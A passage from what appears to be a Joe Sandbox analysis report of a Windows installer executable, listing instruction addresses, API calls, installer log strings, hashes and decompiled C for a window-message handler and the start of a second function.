0x00468bb6
0x00468bc3
0x00468bca
0x00468bca
0x00468bdf
0x0046910c
0x0046910f
0x00469113
0x00000000
0x00469115
0x00469115
0x00469119
0x00000000
0x0046911b
0x00469120
0x00000000
0x00469120
0x00469119
0x00468be5
0x00468bea
0x00468bf6
0x00468c0a
0x00468c10
0x00468c15
0x00468c23
0x00468c26
0x00468c2a
0x00468c66
0x00468c2c
0x00468c35
0x00468c40
0x00468c46
0x00468c53
0x00468c5a
0x00468c5a
0x00468c6b
0x00468c6e
0x00468c72
0x00468f31
0x00000000
0x00468c78
0x00468c78
0x00468c7c
0x00468c80
0x00468cac
0x00468cc2
0x00468c82
0x00468c82
0x00468c85
0x00468c8c
0x00468c95
0x00468c9e
0x00468c9e
0x00468cc5
0x00468cc9
0x00468d2b
0x00468ccb
0x00468ccf
0x00468cd5
0x00468ce0
0x00468ce6
0x00468cf1
0x00468cf7
0x00468d02
0x00468d08
0x00468d1f
0x00468d1f
0x00468d39
0x00468d44
0x00468d4a
0x00468d4f
0x00468d51
0x00468f20
0x00468f25
0x00468f29
0x00468f2b
0x00468f2b
0x00000000
0x00468d57
0x00468d5b
0x00468d61
0x00468d6c
0x00468d72
0x00468d7d
0x00468d83
0x00468d8e
0x00468d94
0x00468da1
0x00468dab
0x00468db0
0x00468db4
0x00468dce
0x00468dce
0x00468dda
0x00468ddd
0x00468e2c
0x00468e31
0x00000000
0x00468ddf
0x00468dee
0x00468dfe
0x00468e09
0x00468e0f
0x00468e1a
0x00468e1e
0x00468e23
0x00468e26
0x00000000
0x00000000
0x00000000
0x00000000
0x00468e26
0x00468db6
0x00468db9
0x00468dbc
0x00000000
0x00468dbe
0x00468dc1
0x00468dc4
0x00468e3b
0x00468e3e
0x00468e41
0x00468f35
0x00468f35
0x00468f39
0x00468fff
0x00469002
0x00469007
0x0046900b
0x0046901f
0x00469023
0x00000000
0x00469025
0x00469034
0x00469044
0x0046904f
0x00469055
0x00469060
0x00469069
0x0046906c
0x0046907d
0x0046907d
0x00469088
0x0046908a
0x0046908d
0x00000000
0x00000000
0x00469093
0x00469096
0x00000000
0x0046909c
0x0046909f
0x004690a3
0x004690c6
0x004690c9
0x004690cf
0x004690d6
0x004690df
0x004690e4
0x004690e6
0x004690f9
0x004690e8
0x004690ed
0x004690ed
0x00469101
0x00469105
0x00000000
0x00469107
0x00000000
0x00469107
0x004690a5
0x004690a5
0x004690ae
0x004690b3
0x004690b5
0x00000000
0x004690b7
0x004690bc
0x00000000
0x004690bc
0x004690b5
0x004690a3
0x00000000
0x00469096
0x0046912a
0x0046912f
0x0046913a
0x00469142
0x00469148
0x004691ae
0x0046914a
0x0046914a
0x0046914e
0x00469150
0x0046915f
0x00469161
0x00469164
0x0046916b
0x0046916d
0x0046917c
0x0046917e
0x0046918a
0x0046918f
0x00469191
0x00469193
0x0046919f
0x004691a1
0x004691a1
0x00469191
0x0046916b
0x004691a4
0x004691a8
0x004691a8
0x004691b5
0x004691bb
0x004691cd
0x004691e0
0x004691f2
0x004691fd
0x00469206
0x00469218
0x0046921d
0x00469222
0x00469223
0x00469228
0x0046922b
0x0046922e
0x00469234
0x00469235
0x0046923a
0x0046923d
0x00469240
0x00469247
0x0046924d
0x00469252
0x00469256
0x004692a8
0x004692ad
0x004692b2
0x004692b3
0x004692b8
0x004692bb
0x004692c1
0x004692c7
0x004692cc
0x004692d0
0x004692ee
0x004692d2
0x004692d5
0x004692de
0x004692de
0x004692f3
0x004692f5
0x004692f8
0x004692fb
0x00469308
0x00469258
0x00469265
0x0046926d
0x00469273
0x00469280
0x00469295
0x00469312
0x00469314
0x00469315
0x00469344
0x00469349
0x0046934c
0x00469350
0x00469352
0x0046935e
0x00469363
0x0046936a
0x0046936f
0x0046936f
0x0046936a
0x00469374
0x00469376
0x00469379
0x0046937c
0x00469389
0x00469389
0x0046906e
0x00469073
0x00000000
0x00469073
0x0046906c
0x0046900d
0x00469012
0x00000000
0x00469012
0x00468f3f
0x00468f3f
0x00468f42
0x00468f46
0x00000000
0x00468f4c
0x00468f4c
0x00468f4e
0x00468f56
0x00468f5b
0x00000000
0x00468f50
0x00468f50
0x00468f54
0x00468f6d
0x00468f72
0x00468f74
0x00468f8d
0x00468f92
0x00468f94
0x00000000
0x00468f96
0x00468f96
0x00468fa2
0x00468fa5
0x00468ff0
0x00468ff5
0x00000000
0x00468fa7
0x00468fb6
0x00468fc6
0x00468fd1
0x00468fd7
0x00468fe2
0x00468fe6
0x00468feb
0x00468fee
0x00000000
0x00000000
0x00000000
0x00000000
0x00468fee
0x00468fa5
0x00468f76
0x00468f7b
0x00000000
0x00468f7b
0x00000000
0x00000000
0x00000000
0x00468f54
0x00468f4e
0x00468f46
0x00468e47
0x00468e4a
0x00468e4d
0x00000000
0x00468e53
0x00468e53
0x00468e56
0x00468e5a
0x00000000
0x00468e60
0x00468e60
0x00468e63
0x00468e67
0x00468efd
0x00468f00
0x00468f04
0x00468f15
0x00000000
0x00468f06
0x00468f0b
0x00000000
0x00468f0b
0x00468e6d
0x00468e6d
0x00468e79
0x00468e7e
0x00468e80
0x00468ef6
0x00000000
0x00468e82
0x00468e82
0x00468e86
0x00468e9d
0x00468ea3
0x00468ea8
0x00468eb1
0x00468eb9
0x00468ebf
0x00468e88
0x00468e8b
0x00468e8b
0x00468e96
0x00468e96
0x00468e96
0x00468e96
0x00468e96
0x00468ecd
0x00468ed2
0x00468ed4
0x00468eea
0x00000000
0x00468ed6
0x00468edb
0x00000000
0x00468edb
0x00468ed4
0x00468e80
0x00468e67
0x00468e5a
0x00468e4d
0x00468dc6
0x00468dc9
0x00468dcc
0x00000000
0x00000000
0x00000000
0x00000000
0x00468dcc
0x00468dc4
0x00468dbc
0x00468db4
0x00468d51
0x00468bf8
0x00468bfd
0x0046967b
0x00469682
0x0046968d
0x0046969a
0x0046969f
0x004696a4
0x004696a7
0x004696ab
0x004696be
0x004696ad
0x004696b2
0x004696b2
0x004696d2
0x004696d9
0x004696e1
0x004696ee
0x004696fb
0x00469706
0x00469706
0x00469684
0x00469684
0x00469687
0x0046968b
0x00000000
0x00000000
0x0046968b
0x00469712
0x0046971b
0x00469720
0x00469724
0x00469744
0x00469751
0x00469726
0x0046972b
0x00469738
0x00469738
0x0046975d
0x004697c4
0x004697c8
0x004697f5
0x0046980b
0x004697ca
0x004697d1
0x004697e7
0x004697e7
0x0046975f
0x0046975f
0x00469767
0x00469769
0x00469769
0x00469777
0x00469779
0x00469779
0x00469789
0x00469792
0x0046979e
0x004697a7
0x004697bd
0x004697bd
0x0046975d
0x00469813
0x0046981c
0x0046983f
0x0046981e
0x0046982b
0x0046982b
0x00469846
0x00469849
0x0046987a
0x0046987d
0x00469880
0x00469885
0x00469889
0x00000000
0x00469891
0x00469896
0x00469896
0x00468bf6
0x00000000

APIs

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

LocalFileTimeToFileTime.KERNEL32(-00000034,00000004,00000000,0046984E,?,00000000,00469897,?,00000000,004699D0,?,00000000,?,00000000,?,0046A316), ref: 00468B7F

Part of subcall function 004531A8: FindClose.KERNEL32(00000000,000000FF,00468B96,00000000,0046984E,?,00000000,00469897,?,00000000,004699D0,?,00000000,?,00000000), ref: 004531BE

Part of subcall function 00466E18: FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00466E20
Part of subcall function 00466E18: FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00466E2F

Part of subcall function 0042C8F0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C914

Part of subcall function 00452AD8: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452CAF,?,00000000,00452D73), ref: 00452BFF

Strings

InUn, xrefs: 00469356
Will register the file (a type library) later., xrefs: 004696AD
, xrefs: 00468DF9, 00468FC1, 0046903F
Version of existing file: %u.%u.%u.%u, xrefs: 00468DA6
Same time stamp. Skipping., xrefs: 00468F76
User opted not to overwrite the existing file. Skipping., xrefs: 0046906E
Existing file's MD5 sum is different from our file. Proceeding., xrefs: 00468EE5
Installing the file., xrefs: 0046912A
-- File entry --, xrefs: 00468993
Couldn't read time stamp. Skipping., xrefs: 00468F56
Incrementing shared file count (32-bit)., xrefs: 0046973F
Failed to strip read-only attribute., xrefs: 004690F4
Version of our file: (none), xrefs: 00468D26
Existing file is protected by Windows File Protection. Skipping., xrefs: 0046900D
Failed to read existing file's MD5 sum. Proceeding., xrefs: 00468EF1
Skipping due to "onlyifdestfileexists" flag., xrefs: 0046911B
@, xrefs: 00468A40
.tmp, xrefs: 004691D8
Skipping due to "onlyifdoesntexist" flag., xrefs: 00468BF8
Version of our file: %u.%u.%u.%u, xrefs: 00468D1A
Time stamp of our file: (failed to read), xrefs: 00468BD1
Incrementing shared file count (64-bit)., xrefs: 00469726
Dest file is protected by Windows File Protection., xrefs: 00468B17
Time stamp of existing file: %s, xrefs: 00468C55
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 004690B7
Same version. Skipping., xrefs: 00468F06
Version of existing file: (none), xrefs: 00468F1B
Will register the file (a DLL/OCX) later., xrefs: 004696B9
Dest filename: %s, xrefs: 00468AE5
Stripped read-only attribute., xrefs: 004690E8
Existing file is a newer version. Skipping., xrefs: 00468E2C
Time stamp of our file: %s, xrefs: 00468BC5
Existing file's MD5 sum matches our file. Skipping., xrefs: 00468ED6
Dest file exists., xrefs: 00468BE5
Existing file has a later time stamp. Skipping., xrefs: 00468FF0
Time stamp of existing file: (failed to read), xrefs: 00468C61

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Time$File$Local$CloseFindFullNamePathQuerySystemValue
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 2131814033-2710193735
Opcode ID: 3592ff47ae3a30284f7f24d0b83eeca75af130e836cb370d2386e0ae0c6e5917
Instruction ID: 2922f7f219a65e75ed882ee80f0673666a165f30165e7c79126a7e7361798852
Opcode Fuzzy Hash: 3592ff47ae3a30284f7f24d0b83eeca75af130e836cb370d2386e0ae0c6e5917
Instruction Fuzzy Hash: 56829530A042489FDF21DFA5C885BDDBBB5AF05304F1441ABE844BB392E7799E45CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00423E24 Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00423E24(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				struct HWND__* _t130;
				struct HWND__* _t133;
				void* _t134;
				struct HWND__* _t135;
				struct HWND__* _t137;
				struct HWND__* _t139;
				struct HWND__* _t142;
				intOrPtr _t143;
				intOrPtr _t153;
				struct HWND__* _t160;
				struct HWND__* _t162;
				int _t165;
				int _t168;
				struct HWND__* _t169;
				struct HWND__* _t180;
				struct HWND__* _t186;
				intOrPtr _t187;
				struct HWND__* _t190;
				intOrPtr _t191;
				int _t198;
				struct HWND__* _t202;
				struct HWND__* _t207;
				struct HWND__* _t214;
				struct HWND__* _t216;
				intOrPtr _t217;
				struct HWND__* _t219;
				intOrPtr _t225;
				struct HWND__* _t241;
				struct HWND__* _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t257;
				struct HWND__* _t262;
				int _t265;
				intOrPtr _t269;
				intOrPtr* _t274;
				void* _t279;
				intOrPtr _t281;
				struct HWND__* _t285;
				struct HWND__* _t286;
				void* _t300;
				void* _t303;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t330;
				void* _t331;
				void* _t333;
				void* _t338;
				void* _t339;
				intOrPtr _t340;

				_push(_t333);
				_push(_t331);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t339);
				_push(0x424374);
				_push( *[fs:edx]);
				 *[fs:edx] = _t340;
				 *(_v12 + 0xc) = 0;
				_t279 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x80)) + 8)) - 1;
				if(_t279 < 0) {
					L5:
					E00423D80(_v8, _v12);
					_t281 =  *_v12;
					_t129 = _t281;
					__eflags = _t129 - 0x112;
					if(__eflags > 0) {
						__eflags = _t129 - 0xb017;
						if(__eflags > 0) {
							_t130 = _t129 - 0xb01a;
							__eflags = _t130;
							if(_t130 == 0) {
								_t133 = IsIconic( *(_v8 + 0x20));
								__eflags = _t133;
								if(_t133 == 0) {
									_t135 = GetFocus();
									_t314 = _v8;
									__eflags = _t135 -  *((intOrPtr*)(_t314 + 0x20));
									if(_t135 ==  *((intOrPtr*)(_t314 + 0x20))) {
										_t137 = E0041F20C(0);
										__eflags = _t137;
										if(_t137 != 0) {
											SetFocus(_t137);
										}
									}
								}
								L87:
								_t134 = 0;
								_pop(_t313);
								 *[fs:eax] = _t313;
								goto L88;
							}
							_t139 = _t130 - 5;
							__eflags = _t139;
							if(_t139 == 0) {
								E00424A68(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L87;
							}
							_t142 = _t139 - 1;
							__eflags = _t142;
							if(_t142 == 0) {
								_t143 = _v12;
								__eflags =  *(_t143 + 4);
								if( *(_t143 + 4) != 0) {
									E00424744(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004246EC(_v8, _t331, _t333,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L87;
							}
							__eflags = _t142 == 0x11;
							if(_t142 == 0x11) {
								_t153 = _v12;
								__eflags =  *((intOrPtr*)(_t153 + 4)) - 1;
								if( *((intOrPtr*)(_t153 + 4)) != 1) {
									 *(_v8 + 0x88) =  *(_v12 + 8);
								} else {
									 *(_v12 + 0xc) =  *(_v8 + 0x88);
								}
							} else {
								L86:
								E00423D9C(_t339); // executed
							}
							goto L87;
						}
						if(__eflags == 0) {
							_t160 =  *(_v8 + 0x28);
							__eflags = _t160;
							if(_t160 != 0) {
								_t335 = _t160;
								_t162 = E004183F8(_t160);
								__eflags = _t162;
								if(_t162 != 0) {
									_t165 = IsWindowEnabled(E004183F8(_t335));
									__eflags = _t165;
									if(_t165 != 0) {
										_t168 = IsWindowVisible(E004183F8(_t335));
										__eflags = _t168;
										if(_t168 != 0) {
											 *0x48c57c = 0;
											_t169 = GetFocus();
											SetFocus(E004183F8(_t335));
											E00415458(_t335,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t169);
											 *0x48c57c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						}
						_t180 = _t129 + 0xfffffece - 7;
						__eflags = _t180;
						if(_t180 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t281 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L87;
						}
						_t186 = _t180 - 0xaec7;
						__eflags = _t186;
						if(_t186 == 0) {
							_t187 = _v8;
							__eflags =  *((short*)(_t187 + 0xbe));
							if( *((short*)(_t187 + 0xbe)) != 0) {
								 *((intOrPtr*)(_v8 + 0xbc))();
							}
							goto L87;
						}
						_t190 = _t186 - 1;
						__eflags = _t190;
						if(_t190 == 0) {
							_t191 = _v8;
							__eflags =  *((short*)(_t191 + 0xb6));
							if( *((short*)(_t191 + 0xb6)) != 0) {
								 *((intOrPtr*)(_v8 + 0xb4))();
							}
							goto L87;
						}
						__eflags = _t190 == 0x15;
						if(_t190 == 0x15) {
							_t285 =  *(_v8 + 0x28);
							__eflags = _t285;
							if(_t285 != 0) {
								__eflags =  *(_t285 + 0x124);
								if( *(_t285 + 0x124) != 0) {
									_t198 = IsWindowEnabled(E004183F8(_t285));
									__eflags = _t198;
									if(_t198 != 0) {
										_t202 = E00412528( *((intOrPtr*)( *(_v8 + 0x28) + 0x124)), _v12);
										__eflags = _t202;
										if(_t202 != 0) {
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						} else {
							goto L86;
						}
					}
					if(__eflags == 0) {
						_t207 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
						__eflags = _t207;
						if(_t207 == 0) {
							E004243AC(_v8, _t287);
						} else {
							__eflags = _t207 == 0x100;
							if(_t207 == 0x100) {
								E004243F4(_v8);
							} else {
								E00423D9C(_t339);
							}
						}
						goto L87;
					}
					__eflags = _t129 - 0x14;
					if(__eflags > 0) {
						_t214 = _t129 - 0x15;
						__eflags = _t214;
						if(_t214 == 0) {
							__eflags =  *0x48c594 - 0x20;
							if( *0x48c594 >= 0x20) {
								__eflags =  *0x48d648;
								if( *0x48d648 != 0) {
									 *0x48d648();
								}
							}
							goto L87;
						}
						_t216 = _t214 - 1;
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _v12;
							__eflags =  *(_t217 + 4);
							if( *(_t217 + 4) != 0) {
								E00404FA4();
							}
							goto L87;
						}
						_t219 = _t216 - 6;
						__eflags = _t219;
						if(_t219 == 0) {
							E00423D9C(_t339);
							_pop(_t300);
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x7d)) =  ~( ~( *(_v12 + 4)));
							_t225 = _v12;
							__eflags =  *(_t225 + 4);
							if( *(_t225 + 4) == 0) {
								E00423C9C(_v8, _t300);
								PostMessageA( *(_v8 + 0x20), 0xb001, 0, 0);
							} else {
								E00423D2C(_v8);
								PostMessageA( *(_v8 + 0x20), 0xb000, 0, 0);
							}
							goto L87;
						}
						__eflags = _t219 == 0x1b;
						if(_t219 == 0x1b) {
							 *(_v12 + 0xc) = E00424390(_v8);
							goto L87;
						} else {
							goto L86;
						}
					}
					if(__eflags == 0) {
						 *_v12 = 0x27;
						E00423D9C(_t339);
						goto L87;
					}
					_t241 = _t129 - 7;
					__eflags = _t241;
					if(_t241 == 0) {
						PostMessageA( *(_v8 + 0x20), 0xb01a, 0, 0);
						E00423D9C(_t339);
						goto L87;
					}
					_t246 = _t241 - 3;
					__eflags = _t246;
					if(_t246 == 0) {
						_t247 = _v12;
						__eflags =  *(_t247 + 4);
						if( *(_t247 + 4) == 0) {
							E00423D9C(_t339);
							_pop(_t303);
							_t249 = _v8;
							__eflags =  *(_t249 + 0x84);
							if( *(_t249 + 0x84) == 0) {
								 *((intOrPtr*)(_v8 + 0x84)) = E0041F0BC( *(_v8 + 0x20), _t281, _t331, _t333);
							}
							E00423C9C(_v8, _t303);
						} else {
							E00423D2C(_v8);
							_t257 = _v8;
							_t258 =  *(_t257 + 0x84);
							__eflags =  *(_t257 + 0x84);
							if( *(_t257 + 0x84) != 0) {
								E0041F170(_t258);
								__eflags = 0;
								 *((intOrPtr*)(_v8 + 0x84)) = 0;
							}
							E00423D9C(_t339);
						}
						goto L87;
					}
					_t262 = _t246 - 5;
					__eflags = _t262;
					if(_t262 == 0) {
						_t265 = IsIconic( *(_v8 + 0x20));
						__eflags = _t265;
						if(_t265 == 0) {
							E00423D9C(_t339);
						} else {
							E00423DD8(_t339);
						}
						goto L87;
					}
					__eflags = _t262 == 1;
					if(_t262 == 1) {
						_t269 = _v8;
						_t270 =  *(_t269 + 0x28);
						__eflags =  *(_t269 + 0x28);
						if( *(_t269 + 0x28) != 0) {
							E00422E64(_t270, _t287);
						}
						goto L87;
					} else {
						goto L86;
					}
				} else {
					_t286 = _t279 + 1;
					_t338 = 0;
					while(1) {
						_t274 = E0040B654( *((intOrPtr*)(_v8 + 0x80)), _t338);
						_t287 = _t274;
						if( *_t274() != 0) {
							_t134 = 0;
							_pop(_t330);
							 *[fs:eax] = _t330;
							break;
						}
						_t338 = _t338 + 1;
						_t286 = _t286 - 1;
						__eflags = _t286;
						if(_t286 != 0) {
							continue;
						}
						goto L5;
					}
					L88:
					return _t134;
				}
			}

0x00423e2b
0x00423e2c
0x00423e2d
0x00423e30
0x00423e35
0x00423e36
0x00423e3b
0x00423e3e
0x00423e46
0x00423e55
0x00423e58
0x00423e8c
0x00423e92
0x00423e9a
0x00423e9c
0x00423e9e
0x00423ea3
0x00423f04
0x00423f09
0x00423f3f
0x00423f3f
0x00423f44
0x004242b9
0x004242be
0x004242c0
0x004242c6
0x004242cb
0x004242ce
0x004242d1
0x004242d9
0x004242de
0x004242e0
0x004242e7
0x004242e7
0x004242e0
0x004242d1
0x0042436a
0x0042436a
0x0042436c
0x0042436f
0x00000000
0x0042436f
0x00423f4a
0x00423f4a
0x00423f4d
0x004242fe
0x00000000
0x004242fe
0x00423f53
0x00423f53
0x00423f54
0x00424305
0x00424308
0x0042430c
0x00424331
0x0042430e
0x0042431c
0x0042431c
0x00000000
0x0042430c
0x00423f5a
0x00423f5d
0x00424338
0x0042433b
0x0042433f
0x0042435b
0x00424341
0x0042434d
0x0042434d
0x00423f63
0x00424363
0x00424364
0x00424369
0x00000000
0x00423f5d
0x00423f0b
0x004241cc
0x004241cf
0x004241d1
0x004241d7
0x004241db
0x004241e0
0x004241e2
0x004241f0
0x004241f5
0x004241f7
0x00424205
0x0042420a
0x0042420c
0x00424212
0x00424219
0x00424228
0x00424241
0x00424247
0x0042424c
0x00424256
0x00424256
0x0042420c
0x004241f7
0x004241e2
0x00000000
0x004241d1
0x00423f16
0x00423f16
0x00423f19
0x0042414f
0x00000000
0x0042414f
0x00423f1f
0x00423f1f
0x00423f24
0x00424262
0x00424265
0x0042426d
0x0042427f
0x0042427f
0x00000000
0x0042426d
0x00423f2a
0x00423f2a
0x00423f2b
0x0042428a
0x0042428d
0x00424295
0x004242a7
0x004242a7
0x00000000
0x00424295
0x00423f31
0x00423f34
0x00424171
0x00424174
0x00424176
0x0042417c
0x00424183
0x00424191
0x00424196
0x00424198
0x004241ad
0x004241b2
0x004241b4
0x004241bd
0x004241bd
0x004241b4
0x00424198
0x00424183
0x00000000
0x00423f3a
0x00000000
0x00423f3a
0x00423f34
0x00423ea5
0x00423f73
0x00423f73
0x00423f78
0x00423f86
0x00423f7a
0x00423f7a
0x00423f7f
0x00423f93
0x00423f81
0x00423f9e
0x00423fa3
0x00423f7f
0x00000000
0x00423f78
0x00423eab
0x00423eae
0x00423edd
0x00423edd
0x00423ee0
0x00423fc1
0x00423fc8
0x00423fce
0x00423fd5
0x00423fdb
0x00423fdb
0x00423fd5
0x00000000
0x00423fc8
0x00423ee6
0x00423ee6
0x00423ee7
0x00424157
0x0042415a
0x0042415e
0x00424164
0x00424164
0x00000000
0x0042415e
0x00423eed
0x00423eed
0x00423ef0
0x00424058
0x0042405d
0x00424066
0x0042406d
0x00424070
0x00424073
0x00424077
0x0042409e
0x004240b3
0x00424079
0x0042407c
0x00424091
0x00424091
0x00000000
0x00424077
0x00423ef6
0x00423ef9
0x0042402e
0x00000000
0x00423eff
0x00000000
0x00423eff
0x00423ef9
0x00423eb0
0x00424011
0x00424018
0x00000000
0x0042401d
0x00423eb6
0x00423eb6
0x00423eb9
0x00424046
0x0042404c
0x00000000
0x00424051
0x00423ebf
0x00423ebf
0x00423ec2
0x004240bd
0x004240c0
0x004240c4
0x004240f8
0x004240fd
0x004240fe
0x00424101
0x00424108
0x00424118
0x00424118
0x00424121
0x004240c6
0x004240c9
0x004240ce
0x004240d1
0x004240d7
0x004240d9
0x004240db
0x004240e3
0x004240e5
0x004240e5
0x004240ec
0x004240f1
0x00000000
0x004240c4
0x00423ec8
0x00423ec8
0x00423ecb
0x00423fed
0x00423ff2
0x00423ff4
0x00424003
0x00423ff6
0x00423ff7
0x00423ffc
0x00000000
0x00423ff4
0x00423ed1
0x00423ed2
0x00423fa9
0x00423fac
0x00423faf
0x00423fb1
0x00423fb7
0x00423fb7
0x00000000
0x00423ed8
0x00000000
0x00423ed8
0x00423e5a
0x00423e5a
0x00423e5b
0x00423e5d
0x00423e68
0x00423e6d
0x00423e79
0x00423e7b
0x00423e7d
0x00423e80
0x00423e83
0x00423e83
0x00423e88
0x00423e89
0x00423e89
0x00423e8a
0x00000000
0x00000000
0x00000000
0x00423e8a
0x00424389
0x0042438f
0x0042438f

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0585acbd67d506db8c56e8e85a8f1a6c4bdd483bdf3b1b151fd7ad0e854fb960
Instruction ID: 0778039014ccd3c11777a34a841eaf269347504b9359897c9e37115c01620468
Opcode Fuzzy Hash: 0585acbd67d506db8c56e8e85a8f1a6c4bdd483bdf3b1b151fd7ad0e854fb960
Instruction Fuzzy Hash: 20E15B34700225DBC750EF69E585A5EB7F4FB85304FA580AAE8059B352CB38EE81DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00460F30 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1612
windowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00460F30(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v9;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v60;
				char _v64;
				char _t558;
				signed int _t574;
				signed int _t576;
				void* _t577;
				void* _t612;
				struct HINSTANCE__* _t652;
				intOrPtr _t695;
				intOrPtr _t696;
				intOrPtr _t719;
				intOrPtr _t720;
				intOrPtr _t744;
				intOrPtr _t745;
				intOrPtr _t760;
				intOrPtr _t761;
				intOrPtr _t794;
				void* _t807;
				void* _t832;
				void* _t851;
				intOrPtr _t883;
				intOrPtr _t916;
				void* _t929;
				void* _t955;
				intOrPtr _t977;
				intOrPtr _t1002;
				intOrPtr _t1030;
				intOrPtr _t1039;
				intOrPtr _t1048;
				intOrPtr _t1057;
				intOrPtr _t1058;
				void* _t1085;
				intOrPtr _t1121;
				intOrPtr _t1129;
				intOrPtr _t1132;
				void* _t1134;
				intOrPtr _t1141;
				void* _t1143;
				intOrPtr _t1146;
				intOrPtr _t1159;
				intOrPtr _t1164;
				void* _t1203;
				intOrPtr _t1204;
				intOrPtr _t1213;
				intOrPtr _t1218;
				intOrPtr _t1220;
				intOrPtr _t1221;
				intOrPtr _t1226;
				intOrPtr _t1237;
				void* _t1239;
				intOrPtr _t1241;
				intOrPtr _t1248;
				intOrPtr _t1270;
				intOrPtr _t1275;
				intOrPtr _t1279;
				void* _t1281;
				intOrPtr _t1289;
				intOrPtr _t1302;
				intOrPtr _t1335;
				intOrPtr _t1340;
				intOrPtr _t1345;
				intOrPtr _t1379;
				intOrPtr _t1445;
				intOrPtr* _t1456;
				intOrPtr _t1457;
				char _t1503;
				intOrPtr _t1523;
				intOrPtr _t1524;
				intOrPtr _t1525;
				intOrPtr _t1526;
				intOrPtr _t1536;
				intOrPtr _t1540;
				signed int _t1544;
				intOrPtr _t1557;
				intOrPtr _t1564;
				intOrPtr _t1565;
				intOrPtr _t1567;
				intOrPtr _t1568;
				intOrPtr _t1576;
				intOrPtr _t1580;
				intOrPtr _t1586;
				void* _t1614;
				intOrPtr _t1622;
				void* _t1675;
				intOrPtr _t1681;
				intOrPtr _t1692;
				intOrPtr _t1711;
				intOrPtr _t1715;
				intOrPtr _t1716;
				intOrPtr _t1723;
				intOrPtr _t1724;
				intOrPtr _t1729;
				intOrPtr _t1732;
				intOrPtr _t1745;
				signed int _t1808;
				signed int _t1809;
				signed int _t1814;
				signed int _t1815;
				intOrPtr _t1819;
				intOrPtr _t1828;
				intOrPtr _t1832;
				intOrPtr _t1835;
				signed int _t1853;
				signed int _t1855;
				void* _t1856;
				void* _t1861;
				void* _t1862;
				intOrPtr* _t1864;
				void* _t1871;
